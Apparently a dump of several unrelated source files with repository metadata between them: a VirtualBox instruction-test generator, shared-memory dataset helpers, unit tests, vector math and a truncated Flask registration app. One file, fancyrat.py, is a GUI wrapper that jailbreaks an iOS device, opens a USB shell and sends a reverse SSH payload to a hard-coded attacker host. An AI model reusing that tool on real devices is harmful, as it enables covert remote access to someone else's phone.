                       'VBINSTST_ENDPROC %s%s\n'
                       % ( '_'.join(asRegs),
                           self.ksCheckerPrefix, sName,) );
        else:
            # Prologue
            self.write('\n\n'
                       '; Checks 1 or more register values, expected values pushed on the stack.\n'
                       '; To save space, the callee cleans up the stack.'
                       '; Ref count: %u\n'
                       'VBINSTST_BEGINPROC %s%s\n'
                       ' MY_PUSH_FLAGS\n'
                       % ( self._dCheckFns[sName], self.ksCheckerPrefix, sName, ) );
            # Register checks.
            for i in range(len(asRegs)):
                sReg = asRegs[i];
                iReg = self.oTarget.asGRegs.index(sReg);
                if i == asRegs.index(sReg): # Only check once, i.e. input = output reg.
                    self.write(' cmp %s, [xSP + MY_PUSH_FLAGS_SIZE + xCB + sCB * %u]\n'
                               ' je .equal%u\n'
                               ' push %s %u ; register number\n'
                               ' push %s ; actual\n'
                               ' mov %s, [xSP + sCB*2 + MY_PUSH_FLAGS_SIZE + xCB + sCB * %u]\n'
                               ' push %s ; expected\n'
                               ' call VBINSTST_NAME(Common_BadValue)\n'
                               '.equal%u:\n'
                               % ( sReg, i, i, sPushSize, iReg, sReg, sReg, i, sReg, i, ) );
            # Restore known register values and check the other registers.
            for sReg in asRegs:
                if self.oTarget.is64Bit():
                    self.write(' mov %s, [g_u64KnownValue_%s wrt rip]\n' % (sReg, sReg,));
                else:
                    iReg = self.oTarget.asGRegs.index(sReg)
                    self.write(' mov %s, 0x%x\n' % (sReg, self.au32Regs[iReg],));
            self.write(' MY_POP_FLAGS\n'
                       ' call VBINSTST_NAME(Common_CheckKnownValues)\n'
                       ' ret sCB*%u\n'
                       'VBINSTST_ENDPROC %s%s\n'
                       % (len(asRegs), self.ksCheckerPrefix, sName,));

    # memory setup functions
    self._generateMemSetupFunctions();

    # 64-bit constants.
    if len(self._d64BitConsts) > 0:
        self.write('\n\n'
                   ';\n'
                   '; 64-bit constants\n'
                   ';\n');
        for uVal in self._d64BitConsts:
            self.write('g_u64Const_0x%016x: dq 0x%016x ; Ref count: %d\n' % (uVal, uVal, self._d64BitConsts[uVal], ) );
    return True;
def _generateTests(self):
    """
    Generate the test cases.

    Writes one assembly file per self.cFiles, each containing a header, the
    applicable instruction test functions, a TestInstrMain driver that calls
    them, and the footer (checkers, setup functions, constants).
    """
    for self.iFile in range(self.cFiles):
        if self.cFiles == 1:
            self.sFile = '%s.asm' % (self.oOptions.sOutputBase,)
        else:
            self.sFile = '%s-%u.asm' % (self.oOptions.sOutputBase, self.iFile)
        # '-' as output base means write to stdout instead of a file.
        self.oFile = sys.stdout;
        if self.oOptions.sOutputBase != '-':
            self.oFile = io.open(self.sFile, 'w', buffering = 65536, encoding = 'utf-8');

        self._generateFileHeader();

        # Calc the range.
        iInstrTestStart = self.iFile * self.oOptions.cInstrPerFile;
        iInstrTestEnd = iInstrTestStart + self.oOptions.cInstrPerFile;
        if iInstrTestEnd > len(g_aoInstructionTests):
            iInstrTestEnd = len(g_aoInstructionTests);

        # Generate the instruction tests.
        for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
            oInstrTest = g_aoInstructionTests[iInstrTest];
            if oInstrTest.isApplicable(self):
                self.write('\n'
                           '\n'
                           ';\n'
                           '; %s\n'
                           ';\n'
                           % (oInstrTest.sName,));
                # Fresh random ModR/M-SIB starting indexes per instruction.
                self._randInitIndexes();
                oInstrTest.generateTest(self, self._calcTestFunctionName(oInstrTest, iInstrTest));

        # Generate the main function.
        self.write('\n\n'
                   'VBINSTST_BEGINPROC TestInstrMain\n'
                   ' MY_PUSH_ALL\n'
                   ' sub xSP, 40h\n'
                   '%ifdef VBINSTST_CAN_DO_TRAPS\n'
                   ' VBINSTST_TRAP_RECS_INSTALL\n'
                   '%endif\n'
                   '\n');
        for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
            oInstrTest = g_aoInstructionTests[iInstrTest];
            if oInstrTest.isApplicable(self):
                # Pass the instruction name per the target calling convention,
                # then invoke the generated test function.
                self.write('%%ifdef ASM_CALL64_GCC\n'
                           ' lea rdi, [.szInstr%03u wrt rip]\n'
                           '%%elifdef ASM_CALL64_MSC\n'
                           ' lea rcx, [.szInstr%03u wrt rip]\n'
                           '%%else\n'
                           ' mov xAX, .szInstr%03u\n'
                           ' mov [xSP], xAX\n'
                           '%%endif\n'
                           ' VBINSTST_CALL_FN_SUB_TEST\n'
                           ' call VBINSTST_NAME(%s)\n'
                           % ( iInstrTest, iInstrTest, iInstrTest, self._calcTestFunctionName(oInstrTest, iInstrTest)));
        self.write('\n'
                   '%ifdef VBINSTST_CAN_DO_TRAPS\n'
                   ' VBINSTST_TRAP_RECS_UNINSTALL\n'
                   '%endif\n'
                   ' add xSP, 40h\n'
                   ' MY_POP_ALL\n'
                   ' ret\n\n');
        # Local string table with the instruction names.
        for iInstrTest in range(iInstrTestStart, iInstrTestEnd):
            self.write('.szInstr%03u: db \'%s\', 0\n' % (iInstrTest, g_aoInstructionTests[iInstrTest].sName,));
        self.write('VBINSTST_ENDPROC TestInstrMain\n\n');

        self._generateFileFooter();
        if self.oOptions.sOutputBase != '-':
            self.oFile.close();
        self.oFile = None;
        self.sFile = '';
    return RTEXITCODE_SUCCESS;
def _runMakefileMode(self):
    """
    Generate a list of output files on standard output.

    Used by the build system (kmk) to learn what this script will produce.
    """
    if self.cFiles == 1:
        asFileNames = ['%s.asm' % (self.oOptions.sOutputBase,)];
    else:
        asFileNames = ['%s-%s.asm' % (self.oOptions.sOutputBase, i) for i in range(self.cFiles)];
    print(' '.join(asFileNames));
    return RTEXITCODE_SUCCESS;
def run(self):
    """
    Generates the tests or whatever is required.
    """
    if self.oOptions.fMakefileMode:
        return self._runMakefileMode();
    # Log the seed so a failing run can be reproduced exactly.
    sys.stderr.write('InstructionTestGen.py: Seed = %s\n' % (g_iMyRandSeed,));
    return self._generateTests();
@staticmethod
def main():
    """
    Main function a la C/C++. Returns exit code.
    """

    #
    # Parse the command line.
    #
    oParser = OptionParser(version = __version__[11:-1].strip());
    oParser.add_option('--makefile-mode', dest = 'fMakefileMode', action = 'store_true', default = False,
                       help = 'Special mode for use to output a list of output files for the benefit of '
                              'the make program (kmk).');
    oParser.add_option('--split', dest = 'cInstrPerFile', metavar = '<instr-per-file>', type = 'int', default = 9999999,
                       help = 'Number of instruction to test per output file.');
    oParser.add_option('--output-base', dest = 'sOutputBase', metavar = '<file>', default = None,
                       help = 'The output file base name, no suffix please. Required.');
    oParser.add_option('--target', dest = 'sTargetEnv', metavar = '<target>',
                       default = 'iprt-r3-32',
                       choices = g_dTargetEnvs.keys(),
                       help = 'The target environment. Choices: %s'
                            % (', '.join(sorted(g_dTargetEnvs.keys())),));
    oParser.add_option('--test-size', dest = 'sTestSize', default = InstructionTestGen.ksTestSize_Medium,
                       choices = InstructionTestGen.kasTestSizes,
                       help = 'Selects the test size.');

    (oOptions, asArgs) = oParser.parse_args();
    # No positional arguments are accepted.
    if len(asArgs) > 0:
        oParser.print_help();
        return RTEXITCODE_SYNTAX
    if oOptions.sOutputBase is None:
        print('syntax error: Missing required option --output-base.', file = sys.stderr);
        return RTEXITCODE_SYNTAX

    #
    # Instantiate the program class and run it.
    #
    oProgram = InstructionTestGen(oOptions);
    return oProgram.run();
if __name__ == '__main__':
    # Script entry point: generate the test files and exit with the result code.
    sys.exit(InstructionTestGen.main());
| 43.23125
| 130
| 0.517132
| 87,528
| 0.90386
| 0
| 0
| 2,886
| 0.029802
| 0
| 0
| 25,666
| 0.265041
|
3698ef5864ca5ca9b604faa7dd2e31ba6fa54aa7
| 6,169
|
py
|
Python
|
bann/b_data_functions/pytorch/shared_memory_interface.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
bann/b_data_functions/pytorch/shared_memory_interface.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
bann/b_data_functions/pytorch/shared_memory_interface.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
""".. moduleauthor:: Artur Lissin"""
import abc
from copy import copy
from dataclasses import dataclass
from multiprocessing.managers import SharedMemoryManager
from multiprocessing.shared_memory import SharedMemory
from typing import Tuple, List, Optional, final, TypeVar, Generic
from torch.utils.data import Dataset
import numpy as np # type: ignore
from bann.b_data_functions.errors.custom_erors import KnownErrorBannData
@final
@dataclass
class TypeShapeCon:
    """Container pairing a numpy dtype/shape with the payload itself.

    Exactly one of ``data`` (local, per-process array) or ``shared_data``
    (handle into a shared-memory segment) is normally populated; the helper
    functions below move the payload between the two representations.
    """
    type: np.dtype = np.dtype('float')           # element dtype of the array
    shape: Tuple[int, ...] = (4,)                # array shape (needed to rebuild a view)
    data: Optional[np.ndarray] = None            # local copy of the data
    shared_data: Optional[SharedMemory] = None   # shared-memory segment holding the data
@final
class SmmConManger:
    """Lifecycle wrapper around a SharedMemoryManager.

    Guarantees the wrapped manager is started at most once and shut down at
    most once, no matter how often the helpers are invoked, and never
    restarted after a shutdown.
    """

    def __init__(self) -> None:
        self.__smm: SharedMemoryManager = SharedMemoryManager()
        self.__started: bool = False
        self.__stopped: bool = False

    @property
    def smm(self) -> SharedMemoryManager:
        """The wrapped manager instance."""
        return self.__smm

    def smm_shutdown(self) -> None:
        """Shut the manager down, but only if it is currently running."""
        currently_running = self.__started and not self.__stopped
        if currently_running:
            self.__smm.shutdown()
            self.__stopped = True

    def smm_start(self) -> None:
        """Start the manager unless it was already started or shut down."""
        never_touched = not self.__started and not self.__stopped
        if never_touched:
            self.__smm.start()
            self.__started = True
# Generic element type produced by __getitem__ of the dataset below.
_TypD = TypeVar('_TypD')


class DataSetSharedMemoryA(abc.ABC, Dataset, Generic[_TypD]):
    """Abstract torch Dataset whose payload can be moved into shared memory.

    Subclasses implement the actual storage hooks (_getitem,
    _move_data_to_shared_memory, remap_shared_memory, ...); this base class
    tracks the optional subset view, the subset lock, and ownership of the
    SharedMemoryManager.
    """

    def __init__(self, data_len: int, /) -> None:
        super().__init__()
        # Indices selected via create_subsets(); empty means the full set.
        self.__subset: List[int] = []
        # Guards against taking a subset of a subset.
        self.__subsets_locked: bool = False
        # Manager owning this dataset's shared segments (None until assigned).
        self.__smm: Optional[SharedMemoryManager] = None
        self.__data_len = data_len

    @final
    def __len__(self) -> int:
        """Number of samples (of the subset, if one is active)."""
        return self.__data_len

    @final
    @property
    def subset(self) -> List[int]:
        """The active subset indices (empty when the full set is used)."""
        return self.__subset

    @final
    def _set_subset(self, indices: List[int], /) -> None:
        # Also shrinks the reported length when a non-empty subset is set.
        self.__subset = indices
        if indices:
            self.__data_len = len(indices)

    @final
    def _lock_subsets(self) -> None:
        self.__subsets_locked = True

    @final
    def create_subsets(self, indices: List[int], /) -> 'DataSetSharedMemoryA':
        """Return a shallow copy restricted to *indices*.

        Raises:
            KnownErrorBannData: when called on an object that is itself a subset.
        """
        if self.__subsets_locked:
            raise KnownErrorBannData("subset of subset is prohibited")
        shallow_copy = copy(self)
        shallow_copy._set_subset(indices)
        shallow_copy._lock_subsets()
        shallow_copy._trim_shallow_copy(indices)
        return shallow_copy

    @abc.abstractmethod
    def _getitem(self, item: int, /) -> _TypD:
        """Subclass hook: fetch one sample (data is already mapped locally)."""
        raise NotImplementedError("Abstract method!")

    @final
    def __getitem__(self, item: int) -> _TypD:
        # Ensure shared memory is materialised locally before any access.
        self.remap_shared_memory()
        return self._getitem(item)

    @final
    @property
    def used_smm(self) -> Optional[SharedMemoryManager]:
        """The manager assigned via move_data_to_shared_memory, if any."""
        return self.__smm

    @abc.abstractmethod
    def _trim_shallow_copy(self, indices: List[int], /) -> None:
        """Subclass hook: restrict the copied storage to *indices*."""
        raise NotImplementedError("Abstract method!")

    @abc.abstractmethod
    def remap_shared_memory(self) -> None:
        """Subclass hook: materialise shared segments into local arrays."""
        raise NotImplementedError("Abstract method!")

    @abc.abstractmethod
    def _pre_send_empty(self) -> None:
        """Subclass hook: drop local payload before sending to a worker."""
        raise NotImplementedError("Abstract method!")

    @final
    def pre_send_empty(self) -> None:
        """Strip the manager reference and local payload prior to pickling."""
        self.__smm = None
        self._pre_send_empty()

    @abc.abstractmethod
    def _move_data_to_shared_memory(self) -> None:
        """Subclass hook: copy local arrays into shared-memory segments."""
        raise NotImplementedError("Abstract method!")

    @final
    def move_data_to_shared_memory(self, smm: SharedMemoryManager, /) -> None:
        """Adopt *smm* and move the payload into shared memory.

        Raises:
            KnownErrorBannData: if a manager was already assigned.
        """
        if self.__smm is not None:
            raise KnownErrorBannData("SharedMemoryManager already set")
        self.__smm = smm
        self._move_data_to_shared_memory()
def _generate_shared_mem_it(np_array: np.ndarray, cont: TypeShapeCon,
smm: SharedMemoryManager, /) -> SharedMemory:
cont.shape = np_array.shape
cont.type = np_array.dtype
shm = smm.SharedMemory(size=np_array.nbytes)
np_buffered = np.ndarray(np_array.shape, dtype=np_array.dtype, buffer=shm.buf)
np_buffered[:] = np_array[:]
return shm
def remap_shared_mem(data: TypeShapeCon, indices: List[int], /) -> None:
# TODO (remove copy) at this point DataLoader doesn't work without copy
if not (data.shared_data is None or data.shape is None or data.type is None):
data_point = data.shared_data
np_buffered_data = np.ndarray(data.shape, dtype=data.type, buffer=data_point.buf)
if indices:
data.data = np.array(list(np_buffered_data[index_i] for index_i in indices))
else:
data.data = copy(np_buffered_data)
data.shared_data = None
def generate_shared_mem(data_type_shape: TypeShapeCon, smm: SharedMemoryManager, /) -> None:
    """Move the container's local array into shared memory owned by *smm*.

    No-op when the payload already lives in shared memory.

    Raises:
        KnownErrorBannData: if the container holds neither local nor shared data.
    """
    local_array = data_type_shape.data
    if local_array is None and data_type_shape.shared_data is None:
        raise KnownErrorBannData("Both data types are empty!")
    if local_array is not None:
        data_type_shape.shared_data = _generate_shared_mem_it(local_array, data_type_shape, smm)
        data_type_shape.data = None
def trim_shallow_copy(data_type_shape: TypeShapeCon, indices: List[int], /) -> TypeShapeCon:
    """Return a shallow copy of *data_type_shape*, optionally trimmed to *indices*.

    The shared-memory handle is always carried over as-is; only the private
    array is filtered when *indices* is non-empty.

    Raises:
        KnownErrorBannData: if the container holds neither private nor shared data.
    """
    if data_type_shape.shared_data is None and data_type_shape.data is None:
        raise KnownErrorBannData("Both data types are empty!")
    clone = TypeShapeCon(type=data_type_shape.type, shape=data_type_shape.shape)
    # The shared handle is copied by reference in every case.
    clone.shared_data = data_type_shape.shared_data
    if not indices:
        # No filtering requested: reference the original private array as-is.
        clone.data = data_type_shape.data
        return clone
    source = data_type_shape.data
    if source is not None:
        # Gather the selected rows into a new private array.
        clone.data = np.array(list(source[row] for row in indices))
    return clone
def data_get_item(data: TypeShapeCon, index: int, /) -> np.ndarray:
    """Return element *index* of the container's private array as a fresh ndarray.

    Raises:
        KnownErrorBannData: if the private array is absent (callers are expected
        to have remapped shared memory first).
    """
    payload = data.data
    if payload is None:
        raise KnownErrorBannData("Should never happen")
    return np.array(payload[index])
def data_shallow_copy_shared_mem(data: TypeShapeCon, /) -> TypeShapeCon:
    """Shallow-copy only the shared-memory handle plus type/shape metadata.

    Raises:
        KnownErrorBannData: if the container has no shared-memory segment.
    """
    if data.shared_data is None:
        raise KnownErrorBannData("Shared data is empty!")
    clone = TypeShapeCon(type=data.type, shape=data.shape)
    clone.shared_data = data.shared_data
    return clone
| 32.468421
| 92
| 0.681796
| 3,118
| 0.50543
| 0
| 0
| 2,746
| 0.445129
| 0
| 0
| 435
| 0.070514
|
36990bef47fde53e2358b6c735c82b0360a40313
| 1,090
|
py
|
Python
|
packages/python/yap_kernel/yap_kernel/tests/test_io.py
|
ryandesign/yap
|
9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214
|
[
"Artistic-1.0-Perl",
"ClArtistic"
] | 90
|
2015-03-09T01:24:15.000Z
|
2022-02-24T13:56:25.000Z
|
packages/python/yap_kernel/yap_kernel/tests/test_io.py
|
ryandesign/yap
|
9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214
|
[
"Artistic-1.0-Perl",
"ClArtistic"
] | 52
|
2016-02-14T08:59:37.000Z
|
2022-03-14T16:39:35.000Z
|
packages/python/yap_kernel/yap_kernel/tests/test_io.py
|
ryandesign/yap
|
9a50d1a3d985ec559ebfbb8e9f4d4c6b88b30214
|
[
"Artistic-1.0-Perl",
"ClArtistic"
] | 27
|
2015-11-19T02:45:49.000Z
|
2021-11-25T19:47:58.000Z
|
"""Test IO capturing functionality"""
import io
import zmq
from jupyter_client.session import Session
from yap_kernel.iostream import IOPubThread, OutStream
import nose.tools as nt
def test_io_api():
    """Verify the wrapped stdout exposes the same API surface as a normal TextIO."""
    session = Session()
    context = zmq.Context()
    publisher = context.socket(zmq.PUB)
    pub_thread = IOPubThread(publisher)
    pub_thread.start()
    stream = OutStream(session, pub_thread, 'stdout')
    # Tear down the zmq plumbing first; the API checks below need no live socket.
    pub_thread.stop()
    pub_thread.close()
    context.term()
    assert stream.errors is None
    assert not stream.isatty()
    with nt.assert_raises(io.UnsupportedOperation):
        stream.detach()
    with nt.assert_raises(io.UnsupportedOperation):
        next(stream)
    # All read/seek-style operations must be rejected on the write-only stream.
    for unsupported in (stream.read, stream.readline, stream.seek, stream.tell):
        with nt.assert_raises(io.UnsupportedOperation):
            unsupported()
| 25.952381
| 77
| 0.694495
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 170
| 0.155963
|
369bd233d08fbdcd2a214a81e7c5f52a9ce6ed4e
| 551
|
py
|
Python
|
OSIx/modules/temp_file_manager.py
|
guibacellar/OSIx
|
058714c1870bde0d794452b32ad0e62d544bdd90
|
[
"Apache-2.0"
] | 1
|
2021-08-17T18:45:07.000Z
|
2021-08-17T18:45:07.000Z
|
OSIx/modules/temp_file_manager.py
|
guibacellar/OSIx
|
058714c1870bde0d794452b32ad0e62d544bdd90
|
[
"Apache-2.0"
] | 12
|
2021-08-11T18:24:32.000Z
|
2021-08-23T14:57:36.000Z
|
OSIx/modules/temp_file_manager.py
|
guibacellar/OSIx
|
058714c1870bde0d794452b32ad0e62d544bdd90
|
[
"Apache-2.0"
] | null | null | null |
"""Temporary Files Manager."""
import logging
from configparser import ConfigParser
from typing import Dict
from OSIx.core.base_module import BaseModule
from OSIx.core.temp_file import TempFileHandler
logger = logging.getLogger()
class TempFileManager(BaseModule):
    """Temporary File Manager."""

    def run(self, config: ConfigParser, args: Dict, data: Dict) -> None:
        """Execute Module.

        Purges every temp file when ``purge_temp_files`` is set in *args*;
        otherwise only removes entries whose lifetime has expired.
        """
        if args['purge_temp_files']:
            TempFileHandler.purge()
            return
        TempFileHandler.remove_expired_entries()
| 22.04
| 72
| 0.69873
| 314
| 0.569873
| 0
| 0
| 0
| 0
| 0
| 0
| 98
| 0.177858
|
369d292bf15ec11e1c3a4ad6d68821a207a8fc33
| 1,124
|
py
|
Python
|
vectors/vectormath.py
|
sbanwart/data-science
|
07f568e5f55a43339a9dca3ba3a13b263f54a37c
|
[
"MIT"
] | null | null | null |
vectors/vectormath.py
|
sbanwart/data-science
|
07f568e5f55a43339a9dca3ba3a13b263f54a37c
|
[
"MIT"
] | null | null | null |
vectors/vectormath.py
|
sbanwart/data-science
|
07f568e5f55a43339a9dca3ba3a13b263f54a37c
|
[
"MIT"
] | null | null | null |
import math
def vector_add(v, w):
    """Return the element-wise sum of vectors v and w."""
    return [a + b for a, b in zip(v, w)]
def vector_subtract(v, w):
    """Return the element-wise difference of vectors v and w."""
    return [a - b for a, b in zip(v, w)]
def vector_sum(vectors):
    """Return the element-wise sum of a sequence of equal-length vectors.

    Fix: the original called the bare name ``reduce``, which is a NameError
    on Python 3 (it lives in ``functools`` there). Summing the transposed
    columns also handles an empty input (returns []) instead of raising.
    """
    return [sum(components) for components in zip(*vectors)]
def scalar_multiply(c, v):
    """Return vector v scaled by the number c."""
    return [c * component for component in v]
def vector_means(vectors):
    """Return the component-wise mean of the input vectors: the ith element
    of the result is the mean of the ith elements of all inputs."""
    count = len(vectors)
    return scalar_multiply(1 / count, vector_sum(vectors))
def dot(v, w):
    """Return the dot product v_1 * w_1 + ... + v_n * w_n."""
    total = 0
    for a, b in zip(v, w):
        total += a * b
    return total
def sum_of_squares(v):
    """Return v_1 * v_1 + ... + v_n * v_n (the vector dotted with itself)."""
    return dot(v, v)
def magnitude(v):
    """Return the Euclidean length of v."""
    return math.sqrt(sum_of_squares(v))
def squared_distance(v, w):
    """Return (v_1 - w_1) ** 2 + ... + (v_n - w_n) ** 2."""
    return sum_of_squares(vector_subtract(v, w))
def distance(v, w):
    """Return the Euclidean distance between v and w."""
    return magnitude(vector_subtract(v, w))
| 25.545455
| 79
| 0.615658
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 357
| 0.317616
|
369da642edb63cf01850b1f337a064efb7bb43b6
| 2,800
|
py
|
Python
|
fancyrat.py
|
avacadoPWN/fancyrat
|
477d5cb11a9af4f741770e4790f64884af1d01c3
|
[
"MIT"
] | 1
|
2022-02-20T03:52:03.000Z
|
2022-02-20T03:52:03.000Z
|
fancyrat.py
|
avacadoPWN/fancyrat
|
477d5cb11a9af4f741770e4790f64884af1d01c3
|
[
"MIT"
] | null | null | null |
fancyrat.py
|
avacadoPWN/fancyrat
|
477d5cb11a9af4f741770e4790f64884af1d01c3
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import exploit
import ui_setup
from time import sleep
# --- setup: exploit driver and GUI window ---
checkrain = exploit.Checkrain()
# NOTE(review): hard-coded reverse-SSH callback target — confirm this is configurable.
checkrain.REMOTE_SSH_CC = 'kali@fancyrat.moo.com'
window = ui_setup.UI.window
# True while we still stream exploit log output into the GUI pane.
keep_printing=True
# Main UI event loop: poll the window every 500 ms and drive the exploit state machine.
while True:
    # Cap the output pane at ~14 lines by dropping the oldest line.
    if window['-OUTPUT-'].DisplayText.count('\n') >= 14:
        window['-OUTPUT-'].DisplayText = window['-OUTPUT-'].DisplayText.split(
            '\n', maxsplit=1)[1]
    event, values = window.read(timeout=500)
    #print(event)
    # Window closed or Quit pressed: stop all child processes and leave the loop.
    if event == ui_setup.sg.WINDOW_CLOSED or event == 'Quit':
        checkrain.kill()
        checkrain.kill_inject()
        break
    # PWN button: start the exploit only if it is not already running or finished.
    if event == 'PWN' and checkrain.pid() is None and checkrain.isdone() is False:
        checkrain.pwn()
        #print(checkrain.pid())
        window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
            "[*] Exploiting IOS device!\n", text_color='#0ab3d1')
    # Inject button: requires a running exploit and no injection already in flight.
    if event == 'Inject' and checkrain.pid() != None and checkrain.inject_pid() is None and checkrain.isdone() is False:
        try:
            checkrain.inject()
            window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
                "[***] Openning shell over USB to IOS device.\n")
            try:
                window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
                    "[*] Sending Reverse SSH payload.....\n",)
                # reverse_ssh() returning anything but True is treated as delivery failure.
                if checkrain.reverse_ssh() != True:
                    raise ValueError("payload_not_sent")
                else:
                    window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
                        "[***] Payload sent!!!\n")
            except ValueError:
                window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
                    "[!] Failed to send payload!\n")
                checkrain.kill_inject()
        # NOTE(review): bare except deliberately treats any inject() failure as
        # "shell could not be opened" — consider narrowing the exception type.
        except:
            window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
                "[!] Unable to open shell over USB on IOS device!\n")
            checkrain.kill_inject()
            pass
    # Reset button: kill everything and clear the output pane.
    if event == 'Reset':
        checkrain.kill()
        checkrain.kill_inject()
        window['-OUTPUT-'].update('', background_color='#2b2b2b')
    # Stream exploit log lines until the exploit reports completion once.
    if keep_printing is True:
        if checkrain.isdone() is True:
            window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
                "\n ($$$$=====WIN====$$$$)\n\n", text_color='#28d1b5')
            window['-OUTPUT-'].update(window['-OUTPUT-'].get() +
                " ͡° ͜ʖ ͡°\n\n", text_color='#28d1b5')
            keep_printing = False
        else:
            window['-OUTPUT-'].update(window['-OUTPUT-'].get() + checkrain.log.readline())
    else:
        pass
window.close()
| 35.897436
| 120
| 0.496786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 681
| 0.242694
|
369df66a1e15a4a67f881d9565ed02382eda4bee
| 1,237
|
py
|
Python
|
sysinv/sysinv/sysinv/sysinv/tests/helm/test_base.py
|
albailey/config
|
40ebe63d7dfc6a0a03216ebe55ed3ec9cf5410b9
|
[
"Apache-2.0"
] | 10
|
2020-02-07T18:57:44.000Z
|
2021-09-11T10:29:34.000Z
|
sysinv/sysinv/sysinv/sysinv/tests/helm/test_base.py
|
albailey/config
|
40ebe63d7dfc6a0a03216ebe55ed3ec9cf5410b9
|
[
"Apache-2.0"
] | 1
|
2021-01-14T12:01:55.000Z
|
2021-01-14T12:01:55.000Z
|
sysinv/sysinv/sysinv/sysinv/tests/helm/test_base.py
|
albailey/config
|
40ebe63d7dfc6a0a03216ebe55ed3ec9cf5410b9
|
[
"Apache-2.0"
] | 10
|
2020-10-13T08:37:46.000Z
|
2022-02-09T00:21:25.000Z
|
# Copyright (c) 2021 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import mock
from sysinv.helm.base import BaseHelm
from sysinv.helm.helm import HelmOperator
from sysinv.tests import base as test_base
class TestHelmBase(test_base.TestCase):
    """Unit tests for BaseHelm._num_replicas_for_platform_app."""

    def test_num_replicas_for_platform_app_0_controllers(self):
        self.check_num_replicas_for_platform_app(num_provisioned_controllers=0, expected_replicas=1)

    def test_num_replicas_for_platform_app_1_controllers(self):
        self.check_num_replicas_for_platform_app(num_provisioned_controllers=1, expected_replicas=1)

    def test_num_replicas_for_platform_app_2_controllers(self):
        self.check_num_replicas_for_platform_app(num_provisioned_controllers=2, expected_replicas=2)

    def check_num_replicas_for_platform_app(self, num_provisioned_controllers, expected_replicas):
        """Drive the replica calculation with a mocked dbapi controller count."""
        operator_stub = mock.MagicMock(spec=HelmOperator)
        operator_stub.dbapi = mock.MagicMock()
        operator_stub.dbapi.count_hosts_matching_criteria.return_value = num_provisioned_controllers
        helm = BaseHelm(operator_stub)
        self.assertEqual(helm._num_replicas_for_platform_app(), expected_replicas)
| 37.484848
| 100
| 0.805174
| 1,008
| 0.814875
| 0
| 0
| 0
| 0
| 0
| 0
| 84
| 0.067906
|
369eb5cfd592210dd63a2cf4b6ab2112394dc2c9
| 612
|
py
|
Python
|
tests/test_as_decimal.py
|
lkattis-signal/SignalSDK
|
f085b9cae0495f4e016b9982df271efc6fd0a8f5
|
[
"Apache-2.0"
] | 10
|
2020-09-29T06:36:45.000Z
|
2022-03-14T18:15:50.000Z
|
tests/test_as_decimal.py
|
lkattis-signal/SignalSDK
|
f085b9cae0495f4e016b9982df271efc6fd0a8f5
|
[
"Apache-2.0"
] | 53
|
2020-10-08T10:05:00.000Z
|
2022-03-29T14:21:18.000Z
|
tests/test_as_decimal.py
|
lkattis-signal/SignalSDK
|
f085b9cae0495f4e016b9982df271efc6fd0a8f5
|
[
"Apache-2.0"
] | 5
|
2020-09-25T07:48:04.000Z
|
2021-11-23T07:08:56.000Z
|
from decimal import Decimal
from signal_ocean._internals import as_decimal
def test_handles_None():
    """None input maps to None."""
    result = as_decimal(None)
    assert result is None
def test_handles_empty_strings():
    """An empty string maps to None."""
    result = as_decimal("")
    assert result is None
def test_parses_strings():
    """Numeric strings are parsed exactly."""
    result = as_decimal("12.345")
    assert result == Decimal("12.345")
def test_handles_0():
    """Zero is converted, not treated as missing."""
    result = as_decimal(0.0)
    assert result == Decimal("0.0")
def test_converts_floats_to_decimals_exactly():
    """Floats are converted via their decimal text, not their binary value."""
    value = as_decimal(24.390015)
    # Decimal(float) captures the imprecise binary expansion (24.39001599999...),
    # so it must differ from the exact conversion...
    assert value != Decimal(24.390015)
    # ...while the string-based Decimal is precisely 24.390015.
    assert value == Decimal("24.390015")
| 20.4
| 57
| 0.714052
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 116
| 0.189542
|
369efff06f7a72f84b0e9a781b19f53a96b5ca56
| 1,610
|
py
|
Python
|
Francisco_Trujillo/Assignments/registration/serverre.py
|
webguru001/Python-Django-Web
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
[
"MIT"
] | 5
|
2019-05-17T01:30:02.000Z
|
2021-06-17T21:02:58.000Z
|
Francisco_Trujillo/Assignments/registration/serverre.py
|
curest0x1021/Python-Django-Web
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
[
"MIT"
] | null | null | null |
Francisco_Trujillo/Assignments/registration/serverre.py
|
curest0x1021/Python-Django-Web
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template, request, redirect, session, flash
import re
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
app = Flask(__name__)
app.secret_key = 'irtndvieurnviur'
@app.route('/')
def index():
    """Serve the registration form page."""
    template_name = "index.html"
    return render_template(template_name)
# check all fields for emptiness and enforce the minimum password length
def checkForValuelength(form):
    """Return True when every field is non-empty and both passwords have
    at least 8 characters.

    Fix: the original compared with ``<= 8``, which rejected valid
    8-character passwords and contradicted both the comment above it
    ("password >=8") and the flash message ("8 or more character").
    """
    if (len(form['email']) < 1 or
            len(form['fname']) < 1 or
            len(form['lname']) < 1 or
            len(form['password']) < 8 or
            len(form['cpassword']) < 8):
        return False
    return True
# check that first and last name contain only letters
def validNamefileds(form):
    """Return True when both name fields are purely alphabetic."""
    for field in ('fname', 'lname'):
